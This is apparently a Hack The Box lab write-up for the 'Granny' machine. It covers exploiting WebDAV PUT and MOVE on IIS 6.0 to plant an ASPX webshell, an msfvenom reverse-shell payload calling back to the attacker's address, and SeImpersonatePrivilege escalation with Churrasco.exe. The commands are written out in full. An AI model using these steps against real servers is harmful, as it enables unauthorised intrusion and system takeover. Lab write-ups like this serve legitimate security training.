Granny
Overview
Initial Foothold : Microsoft IIS 6.0 Exploitation
Privilege Escalation :
Enumeration
Starting with port scanning
Port Scanning
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Thu, 25 Jun 2020 16:49:55 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ WebDAV type: Unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%)From Full nmap scan we got that port 80 was running Microsoft IIS 6.0
We can also observe that PUT method is allowed from which we can put files on the webserver
Test this functionality using davtest command
From the above result it has been confirmed that we can put files on the server
Confirm that my executing the file
We also found exploit for IIS 6.0 WebServer
Summary
Files can be uploaded on webserver
Exploits are available for Vulnerable WebServer
Exploitation
Using Exploit of IIS 6.0
Use exploit from github for exploiting this Vulnerabilty
Launch Listener on port 4444
Execute the exploit
Exploit Completed Successfully and we got shell
Using PUT method
Using curl we will put webshell on the server
But we can't put aspx files on the webserver directly
so first put text file on the server and then change the move the file to aspx format using MOVE functionality which is allowed
First PUT text format of cmdasp.aspx on the webserver using curl
kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file cmdasp.txt
Now again use curl command to MOVE file from cmdasp.txt to cmdasp.aspx
curl -X MOVE --header "Destination:http://10.10.10.15/cmdasp.aspx" http://10.10.10.15/cmdasp.txt
Got webshell command execution.
Lets try to get reverse shell
First generate reverse shell payload using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4445 -f exe > shell.exeThen upload the shell using the above method
kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file shell.txt
kali@kali:~/htb/10.10.10.15$ curl -X MOVE --header "Destination:http://10.10.10.15/shell.exe" http://10.10.10.15/shell.txt
We got back the reverse shell
Privilege Escalation
After getting shell of service account always check the privileges of the service account
In this case SeImpersonatePrivilege was enabled which we can exploit to gain system shell
Lets use Churrasco.exe exploit from below github repo
Transfer this binary along with reverse shell binary to target host using ftp
After trying many other methods of transfer the exploit ftp successfully uploaded the exploit
Create a text file in windows target which contains
Now execute this in ftp using
this downloaded the required files on the target host
C:\WINDOWS\Temp>churrasco.exe -d c:\windows\temp\shell.exe
Got the system shell
Thats all for this box.
Good Bye :)
Last updated
Was this helpful?